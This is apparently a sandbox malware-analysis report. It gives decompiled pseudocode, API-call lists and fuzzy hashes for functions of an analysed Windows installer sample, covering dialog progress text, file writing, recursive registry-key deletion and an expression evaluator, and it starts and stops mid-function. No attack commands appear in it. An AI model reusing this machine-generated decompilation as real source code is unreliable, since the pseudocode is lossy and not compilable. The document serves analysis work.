                                                                                        				_v20 = _t19;
                                                                                        				ScreenToClient(_t28,  &_v20);
                                                                                        				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                        				if((_v12 & 0x00000066) != 0) {
                                                                                        					_t15 = _v8;
                                                                                        					goto L4;
                                                                                        				}
                                                                                        				return _t25 | 0xffffffff;
                                                                                        			}















                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C3F
                                                                                        • GetMessagePos.USER32 ref: 00404C47
                                                                                        • ScreenToClient.USER32 ref: 00404C61
                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C73
                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                        • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                        • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                                                        				char _v68;
                                                                                        				void* _t11;
                                                                                        				CHAR* _t19;
                                                                                        
                                                                                        				if(_a8 == 0x110) {
                                                                                        					SetTimer(_a4, 1, 0xfa, 0);
                                                                                        					_a8 = 0x113;
                                                                                        				}
                                                                                        				if(_a8 == 0x113) {
                                                                                        					_t11 = E00402E36();
                                                                                        					_t19 = "unpacking data: %d%%";
                                                                                        					if( *0x42f454 == 0) {
                                                                                        						_t19 = "verifying installer: %d%%";
                                                                                        					}
                                                                                        					wsprintfA( &_v68, _t19, _t11);
                                                                                        					SetWindowTextA(_a4,  &_v68);
                                                                                        					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                        				}
                                                                                        				return 0;
                                                                                        			}







                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                        • wsprintfA.USER32 ref: 00402E09
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                                                        • SetDlgItemTextA.USER32 ref: 00402E2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                        • API String ID: 1451636040-1158693248
                                                                                        • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                        • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                                                        • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                        • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 93%
                                                                                        			E004027DF(void* __ebx, void* __eflags) {
                                                                                        				void* _t26;
                                                                                        				long _t31;
                                                                                        				void* _t45;
                                                                                        				void* _t49;
                                                                                        				void* _t51;
                                                                                        				void* _t54;
                                                                                        				void* _t55;
                                                                                        				void* _t56;
                                                                                        
                                                                                        				_t45 = __ebx;
                                                                                        				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                                                        				_t50 = E00402BCE(0xfffffff0);
                                                                                        				 *(_t56 - 0x78) = _t23;
                                                                                        				if(E00405C52(_t50) == 0) {
                                                                                        					E00402BCE(0xffffffed);
                                                                                        				}
                                                                                        				E00405DC1(_t50);
                                                                                        				_t26 = E00405DE6(_t50, 0x40000000, 2);
                                                                                        				 *(_t56 + 8) = _t26;
                                                                                        				if(_t26 != 0xffffffff) {
                                                                                        					_t31 =  *0x42f458;
                                                                                        					 *(_t56 - 0x30) = _t31;
                                                                                        					_t49 = GlobalAlloc(0x40, _t31);
                                                                                        					if(_t49 != _t45) {
                                                                                        						E0040343E(_t45);
                                                                                        						E00403428(_t49,  *(_t56 - 0x30));
                                                                                        						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                        						 *(_t56 - 0x38) = _t54;
                                                                                        						if(_t54 != _t45) {
                                                                                        							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                                        							while( *_t54 != _t45) {
                                                                                        								_t47 =  *_t54;
                                                                                        								_t55 = _t54 + 8;
                                                                                        								 *(_t56 - 0x8c) =  *_t54;
                                                                                        								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                        								_t54 = _t55 +  *(_t56 - 0x8c);
                                                                                        							}
                                                                                        							GlobalFree( *(_t56 - 0x38));
                                                                                        						}
                                                                                        						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                                                        						GlobalFree(_t49);
                                                                                        						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                        					}
                                                                                        					CloseHandle( *(_t56 + 8));
                                                                                        				}
                                                                                        				_t51 = 0xfffffff3;
                                                                                        				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                                                        					_t51 = 0xffffffef;
                                                                                        					DeleteFileA( *(_t56 - 0x78));
                                                                                        					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                        				}
                                                                                        				_push(_t51);
                                                                                        				E00401423();
                                                                                        				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
                                                                                        				return 0;
                                                                                        			}












                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                        • GlobalFree.KERNEL32 ref: 0040288E
                                                                                        • GlobalFree.KERNEL32 ref: 004028A1
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2667972263-0
                                                                                        • Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                        • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                                                        • Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                                        • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 97%
                                                                                        			E70991837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                                                        				void* _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				char _v52;
                                                                                        				void _t45;
                                                                                        				void _t46;
                                                                                        				signed int _t47;
                                                                                        				signed int _t48;
                                                                                        				signed int _t57;
                                                                                        				signed int _t58;
                                                                                        				signed int _t59;
                                                                                        				signed int _t60;
                                                                                        				signed int _t61;
                                                                                        				void* _t67;
                                                                                        				void* _t68;
                                                                                        				void* _t69;
                                                                                        				void* _t70;
                                                                                        				void* _t71;
                                                                                        				signed int _t77;
                                                                                        				void* _t81;
                                                                                        				signed int _t83;
                                                                                        				signed int _t85;
                                                                                        				signed int _t87;
                                                                                        				signed int _t90;
                                                                                        				void* _t101;
                                                                                        
                                                                                        				_t85 = __edx;
                                                                                        				 *0x7099405c = _a8;
                                                                                        				_t77 = 0;
                                                                                        				 *0x70994060 = _a16;
                                                                                        				_v12 = 0;
                                                                                        				_v8 = E7099123B();
                                                                                        				_t90 = E709912FE(_t42);
                                                                                        				_t87 = _t85;
                                                                                        				_t81 = E7099123B();
                                                                                        				_a8 = _t81;
                                                                                        				_t45 =  *_t81;
                                                                                        				if(_t45 != 0x7e && _t45 != 0x21) {
                                                                                        					_a16 = E7099123B();
                                                                                        					_t77 = E709912FE(_t74);
                                                                                        					_v12 = _t85;
                                                                                        					GlobalFree(_a16);
                                                                                        					_t81 = _a8;
                                                                                        				}
                                                                                        				_t46 =  *_t81;
                                                                                        				_t101 = _t46 - 0x2f;
                                                                                        				if(_t101 > 0) {
                                                                                        					_t47 = _t46 - 0x3c;
                                                                                        					__eflags = _t47;
                                                                                        					if(_t47 == 0) {
                                                                                        						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
                                                                                        						if( *((char*)(_t81 + 1)) != 0x3c) {
                                                                                        							__eflags = _t87 - _v12;
                                                                                        							if(__eflags > 0) {
                                                                                        								L56:
                                                                                        								_t48 = 0;
                                                                                        								__eflags = 0;
                                                                                        								L57:
                                                                                        								asm("cdq");
                                                                                        								L58:
                                                                                        								_t90 = _t48;
                                                                                        								_t87 = _t85;
                                                                                        								L59:
                                                                                        								E70991429(_t85, _t90, _t87,  &_v52);
                                                                                        								E70991266( &_v52);
                                                                                        								GlobalFree(_v8);
                                                                                        								return GlobalFree(_a8);
                                                                                        							}
                                                                                        							if(__eflags < 0) {
                                                                                        								L49:
                                                                                        								__eflags = 0;
                                                                                        								L50:
                                                                                        								_t48 = 1;
                                                                                        								goto L57;
                                                                                        							}
                                                                                        							__eflags = _t90 - _t77;
                                                                                        							if(_t90 < _t77) {
                                                                                        								goto L49;
                                                                                        							}
                                                                                        							goto L56;
                                                                                        						}
                                                                                        						_t85 = _t87;
                                                                                        						_t48 = E70992EF0(_t90, _t77, _t85);
                                                                                        						goto L58;
                                                                                        					}
                                                                                        					_t57 = _t47 - 1;
                                                                                        					__eflags = _t57;
                                                                                        					if(_t57 == 0) {
                                                                                        						__eflags = _t90 - _t77;
                                                                                        						if(_t90 != _t77) {
                                                                                        							goto L56;
                                                                                        						}
                                                                                        						__eflags = _t87 - _v12;
                                                                                        						if(_t87 != _v12) {
                                                                                        							goto L56;
                                                                                        						}
                                                                                        						goto L49;
                                                                                        					}
                                                                                        					_t58 = _t57 - 1;
                                                                                        					__eflags = _t58;
                                                                                        					if(_t58 == 0) {
                                                                                        						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
                                                                                        						if( *((char*)(_t81 + 1)) != 0x3e) {
                                                                                        							__eflags = _t87 - _v12;
                                                                                        							if(__eflags < 0) {
                                                                                        								goto L56;
                                                                                        							}
                                                                                        							if(__eflags > 0) {
                                                                                        								goto L49;
                                                                                        							}
                                                                                        							__eflags = _t90 - _t77;
                                                                                        							if(_t90 <= _t77) {
                                                                                        								goto L56;
                                                                                        							}
                                                                                        							goto L49;
                                                                                        						}
                                                                                        						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
                                                                                        						_t85 = _t87;
                                                                                        						_t59 = _t90;
                                                                                        						_t83 = _t77;
                                                                                        						if( *((char*)(_t81 + 2)) != 0x3e) {
                                                                                        							_t48 = E70992F10(_t59, _t83, _t85);
                                                                                        						} else {
                                                                                        							_t48 = E70992F40(_t59, _t83, _t85);
                                                                                        						}
                                                                                        						goto L58;
                                                                                        					}
                                                                                        					_t60 = _t58 - 0x20;
                                                                                        					__eflags = _t60;
                                                                                        					if(_t60 == 0) {
                                                                                        						_t90 = _t90 ^ _t77;
                                                                                        						_t87 = _t87 ^ _v12;
                                                                                        						goto L59;
                                                                                        					}
                                                                                        					_t61 = _t60 - 0x1e;
                                                                                        					__eflags = _t61;
                                                                                        					if(_t61 == 0) {
                                                                                        						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
                                                                                        						if( *((char*)(_t81 + 1)) != 0x7c) {
                                                                                        							_t90 = _t90 | _t77;
                                                                                        							_t87 = _t87 | _v12;
                                                                                        							goto L59;
                                                                                        						}
                                                                                        						__eflags = _t90 | _t87;
                                                                                        						if((_t90 | _t87) != 0) {
                                                                                        							goto L49;
                                                                                        						}
                                                                                        						__eflags = _t77 | _v12;
                                                                                        						if((_t77 | _v12) != 0) {
                                                                                        							goto L49;
                                                                                        						}
                                                                                        						goto L56;
                                                                                        					}
                                                                                        					__eflags = _t61 == 0;
                                                                                        					if(_t61 == 0) {
                                                                                        						_t90 =  !_t90;
                                                                                        						_t87 =  !_t87;
                                                                                        					}
                                                                                        					goto L59;
                                                                                        				}
                                                                                        				if(_t101 == 0) {
                                                                                        					L21:
                                                                                        					__eflags = _t77 | _v12;
                                                                                        					if((_t77 | _v12) != 0) {
                                                                                        						_v24 = E70992D80(_t90, _t87, _t77, _v12);
                                                                                        						_v20 = _t85;
                                                                                        						_t48 = E70992E30(_t90, _t87, _t77, _v12);
                                                                                        						_t81 = _a8;
                                                                                        					} else {
                                                                                        						_v24 = _v24 & 0x00000000;
                                                                                        						_v20 = _v20 & 0x00000000;
                                                                                        						_t48 = _t90;
                                                                                        						_t85 = _t87;
                                                                                        					}
                                                                                        					__eflags =  *_t81 - 0x2f;
                                                                                        					if( *_t81 != 0x2f) {
                                                                                        						goto L58;
                                                                                        					} else {
                                                                                        						_t90 = _v24;
                                                                                        						_t87 = _v20;
                                                                                        						goto L59;
                                                                                        					}
                                                                                        				}
                                                                                        				_t67 = _t46 - 0x21;
                                                                                        				if(_t67 == 0) {
                                                                                        					_t48 = 0;
                                                                                        					__eflags = _t90 | _t87;
                                                                                        					if((_t90 | _t87) != 0) {
                                                                                        						goto L57;
                                                                                        					}
                                                                                        					goto L50;
                                                                                        				}
                                                                                        				_t68 = _t67 - 4;
                                                                                        				if(_t68 == 0) {
                                                                                        					goto L21;
                                                                                        				}
                                                                                        				_t69 = _t68 - 1;
                                                                                        				if(_t69 == 0) {
                                                                                        					__eflags =  *((char*)(_t81 + 1)) - 0x26;
                                                                                        					if( *((char*)(_t81 + 1)) != 0x26) {
                                                                                        						_t90 = _t90 & _t77;
                                                                                        						_t87 = _t87 & _v12;
                                                                                        						goto L59;
                                                                                        					}
                                                                                        					__eflags = _t90 | _t87;
                                                                                        					if((_t90 | _t87) == 0) {
                                                                                        						goto L56;
                                                                                        					}
                                                                                        					__eflags = _t77 | _v12;
                                                                                        					if((_t77 | _v12) == 0) {
                                                                                        						goto L56;
                                                                                        					}
                                                                                        					goto L49;
                                                                                        				}
                                                                                        				_t70 = _t69 - 4;
                                                                                        				if(_t70 == 0) {
                                                                                        					_t48 = E70992D40(_t90, _t87, _t77, _v12);
                                                                                        					goto L58;
                                                                                        				} else {
                                                                                        					_t71 = _t70 - 1;
                                                                                        					if(_t71 == 0) {
                                                                                        						_t90 = _t90 + _t77;
                                                                                        						asm("adc edi, [ebp-0x8]");
                                                                                        					} else {
                                                                                        						if(_t71 == 0) {
                                                                                        							_t90 = _t90 - _t77;
                                                                                        							asm("sbb edi, [ebp-0x8]");
                                                                                        						}
                                                                                        					}
                                                                                        					goto L59;
                                                                                        				}
                                                                                        			}






























                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FreeGlobal
                                                                                        • String ID:
                                                                                        • API String ID: 2979337801-0
                                                                                        • Opcode ID: 8340aaf43a3d47a4a7b22e984f9b082283e570aa8323afcf3c1606915541c32f
                                                                                        • Instruction ID: 93b9c7f0c66128bc38adc14bf8d04e0148e23b5a2497cfc3c825ed7ebf85eea8
                                                                                        • Opcode Fuzzy Hash: 8340aaf43a3d47a4a7b22e984f9b082283e570aa8323afcf3c1606915541c32f
                                                                                        • Instruction Fuzzy Hash: A5512A32E36154EEDB029FB4D8446AEBBBDBBC6245F24005AE40AF3324C2356D41976F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 48%
                                                                                        			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                                                        				void* _v8;
                                                                                        				int _v12;
                                                                                        				char _v276;
                                                                                        				void* _t27;
                                                                                        				signed int _t33;
                                                                                        				intOrPtr* _t35;
                                                                                        				signed int _t45;
                                                                                        				signed int _t46;
                                                                                        				signed int _t47;
                                                                                        
                                                                                        				_t46 = _a12;
                                                                                        				_t47 = _t46 & 0x00000300;
                                                                                        				_t45 = _t46 & 0x00000001;
                                                                                        				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                        				if(_t27 == 0) {
                                                                                        					if((_a12 & 0x00000002) == 0) {
                                                                                        						L3:
                                                                                        						_push(0x105);
                                                                                        						_push( &_v276);
                                                                                        						_push(0);
                                                                                        						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                                                        							__eflags = _t45;
                                                                                        							if(__eflags != 0) {
                                                                                        								L10:
                                                                                        								RegCloseKey(_v8);
                                                                                        								return 0x3eb;
                                                                                        							}
                                                                                        							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                                                        							__eflags = _t33;
                                                                                        							if(_t33 != 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_push(0x105);
                                                                                        							_push( &_v276);
                                                                                        							_push(_t45);
                                                                                        						}
                                                                                        						RegCloseKey(_v8);
                                                                                        						_t35 = E00406656(3);
                                                                                        						if(_t35 != 0) {
                                                                                        							return  *_t35(_a4, _a8, _t47, 0);
                                                                                        						}
                                                                                        						return RegDeleteKeyA(_a4, _a8);
                                                                                        					}
                                                                                        					_v12 = 0;
                                                                                        					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                        						goto L10;
                                                                                        					}
                                                                                        					goto L3;
                                                                                        				}
                                                                                        				return _t27;
                                                                                        			}













                                                                                        APIs
                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CloseEnum$DeleteValue
                                                                                        • String ID:
                                                                                        • API String ID: 1354259210-0
                                                                                        • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                        • Instruction ID: d75478e88f471254037528958efdeb905634950da4f4823c7bb408bf4a1a64a1
                                                                                        • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                                                        • Instruction Fuzzy Hash: 44215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48E54AA68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 77%
                                                                                        			E00401D65(void* __ebx, void* __edx) {
                                                                                        				struct HWND__* _t30;
                                                                                        				CHAR* _t38;
                                                                                        				void* _t48;
                                                                                        				void* _t53;
                                                                                        				signed int _t55;
                                                                                        				signed int _t58;
                                                                                        				long _t61;
                                                                                        				void* _t65;
                                                                                        
                                                                                        				_t53 = __ebx;
                                                                                        				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                                                        					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                                                        				} else {
                                                                                        					E00402BAC(2);
                                                                                        					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                                                        				}
                                                                                        				_t55 =  *(_t65 - 0x1c);
                                                                                        				 *(_t65 + 8) = _t30;
                                                                                        				_t58 = _t55 & 0x00000004;
                                                                                        				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                                                        				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                                                        				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                                                        				if((_t55 & 0x00010000) == 0) {
                                                                                        					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                                                        				} else {
                                                                                        					_t38 = E00402BCE(0x11);
                                                                                        				}
                                                                                        				 *(_t65 - 8) = _t38;
                                                                                        				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                                                        				asm("sbb edi, edi");
                                                                                        				_t61 = LoadImageA( ~_t58 &  *0x42f440,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                                                        				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                                                        				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                                                        					DeleteObject(_t48);
                                                                                        				}
                                                                                        				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                                                        					_push(_t61);
                                                                                        					E004061AB();
                                                                                        				}
                                                                                        				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t65 - 4));
                                                                                        				return 0;
                                                                                        			}












                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                        • Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
                                                                                        • Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                        • Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 73%
                                                                                        			E00401E35(intOrPtr __edx) {
                                                                                        				void* __esi;
                                                                                        				int _t9;
                                                                                        				signed char _t15;
                                                                                        				struct HFONT__* _t18;
                                                                                        				intOrPtr _t30;
                                                                                        				struct HDC__* _t31;
                                                                                        				void* _t33;
                                                                                        				void* _t35;
                                                                                        
                                                                                        				_t30 = __edx;
                                                                                        				_t31 = GetDC( *(_t35 - 8));
                                                                                        				_t9 = E00402BAC(2);
                                                                                        				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                        				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                        				ReleaseDC( *(_t35 - 8), _t31);
                                                                                        				 *0x40b860 = E00402BAC(3);
                                                                                        				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                        				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                                                        				 *0x40b867 = 1;
                                                                                        				 *0x40b864 = _t15 & 0x00000001;
                                                                                        				 *0x40b865 = _t15 & 0x00000002;
                                                                                        				 *0x40b866 = _t15 & 0x00000004;
                                                                                        				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
                                                                                        				_t18 = CreateFontIndirectA(0x40b850);
                                                                                        				_push(_t18);
                                                                                        				_push(_t33);
                                                                                        				E004061AB();
                                                                                        				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                        				return 0;
                                                                                        			}












                                                                                        APIs
                                                                                        • GetDC.USER32(?), ref: 00401E38
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                                        • ReleaseDC.USER32 ref: 00401E6B
                                                                                        • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 3808545654-0
                                                                                        • Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                        • Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
                                                                                        • Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                        • Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 77%
                                                                                        			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                        				char _v36;
                                                                                        				char _v68;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t21;
                                                                                        				signed int _t22;
                                                                                        				void* _t29;
                                                                                        				void* _t31;
                                                                                        				void* _t32;
                                                                                        				void* _t41;
                                                                                        				signed int _t43;
                                                                                        				signed int _t47;
                                                                                        				signed int _t50;
                                                                                        				signed int _t51;
                                                                                        				signed int _t53;
                                                                                        
                                                                                        				_t21 = _a16;
                                                                                        				_t51 = _a12;
                                                                                        				_t41 = 0xffffffdc;
                                                                                        				if(_t21 == 0) {
                                                                                        					_push(0x14);
                                                                                        					_pop(0);
                                                                                        					_t22 = _t51;
                                                                                        					if(_t51 < 0x100000) {
                                                                                        						_push(0xa);
                                                                                        						_pop(0);
                                                                                        						_t41 = 0xffffffdd;
                                                                                        					}
                                                                                        					if(_t51 < 0x400) {
                                                                                        						_t41 = 0xffffffde;
